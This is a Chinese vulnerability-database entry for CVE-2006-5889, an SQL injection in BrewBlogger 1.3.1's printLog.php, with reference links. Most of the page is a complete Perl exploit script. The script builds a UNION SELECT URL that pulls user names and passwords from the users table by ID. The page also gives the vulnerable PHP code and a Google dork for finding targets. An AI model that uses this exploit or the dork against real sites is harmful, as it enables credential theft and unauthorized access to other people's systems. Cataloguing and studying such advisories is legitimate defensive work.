BrewBlogger PrintLog.PHP SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111511 漏洞类型 SQL注入
发布时间 2006-11-10 更新时间 2006-11-15
CVE编号 CVE-2006-5889 CNNVD-ID CNNVD-200611-205
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2751
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-205
|漏洞详情
BrewBlogger(BB)中的printLog.php存在SQL注入漏洞,远程攻击者可通过id参数来执行任意SQL命令。
|漏洞EXP
#!/usr/bin/perl
###########################################################################################
#Target:
#
#       BewBlogger 1.3.1
#       http://brewblogger.zkdigital.com
#
#Vulnerability:
#
#       SQL Injection
#
#Description:
#
#       BrewBlogger does not properly sanitize the 'id=' parameter passed to printLog.php.
#       Since each user entry contains an auto-incrementing ID number, it is possible to
#       enumerate all user names and passwords stored in the 'users'database by iterating
#       through every possible ID number.
#
#Vulnerable Code (truncated):
#
#       $colname_log = (get_magic_quotes_gpc()) ? $_GET['id'] : addslashes($_GET['id']);
#       $query_log = sprintf("SELECT * FROM brewing WHERE id = %s", $colname_log);
#       $log = mysql_query($query_log, $brewing) or die(mysql_error());
#
#Usage:
#       This script will produce a URL which will reveal the user name and password for
#       the specified ID. If no ID is specified, 2 is used (seems to be the usual ID for
#       the first user). The user name will be listed as "Method:" under 'General
#       Information', and the password will be listed as "Cost:".
#
#Usage:
#       ./brewblog.pl <domain name + path> [user id]
#
#Examples:
#
#       ./brewblogger.pl www.beerblog.com 3
#       ./brewblogger.pl www.mysite.com/beerblog
#
#Google Dork:
#
#       intext:"BrewBlogger for PHP"
#
#Discovery/code:
#
#       Craig Heffner
#       heffnercj [at] gmail.com
#       http://www.craigheffner.com
###########################################################################################


print '
###########################################
# BrewBlogger 1.3.1 SQL Injection Exploit #
#                                         #
# Discovered and coded by: Craig Heffner  #
###########################################
';

if(!$ARGV[0] || $ARGV[0] eq "-h"){
       print "\nUsage: ./brewlogger.pl <domain name + path> [user id]\n\nSee script comments for more details\n";
       exit;
}


if(!$ARGV[1]){
       $id = 2;
} else {
       $id = $ARGV[1];
}

$url = "http://" . $ARGV[0] . "/printLog.php?id=0+UNION+SELECT+";
$a = 1;

while($a < 211){
       if($a == 8){
               $string .= "user_name,";
       } elsif($a == 9){
               $string .= "password,";
       } elsif($a == 210){
               $string .= "1";
       } else {
               $string .= "1,";
       }
       $a++;
}

print "\n\nUse the following URL:\n\n" . $url . $string . "+FROM+users+WHERE+id=" . $id . "\n";
exit;

# milw0rm.com [2006-11-10]
|参考资料

来源:VUPEN
名称:ADV-2006-4467
链接:http://www.frsirt.com/english/advisories/2006/4467
来源:MISC
链接:https://sourceforge.net/project/shownotes.php?release_id=463357&group_id=165855
来源:XF
名称:brewblogger-printlog-sql-injection(30200)
链接:http://xforce.iss.net/xforce/xfdb/30200
来源:BID
名称:21026
链接:http://www.securityfocus.com/bid/21026
来源:MISC
链接:http://www.craigheffner.com/security/exploits/brewblogger1.3.1.txt
来源:SECUNIA
名称:22810
链接:http://secunia.com/advisories/22810
来源:MILW0RM
名称:2751
链接:http://milw0rm.com/exploits/2751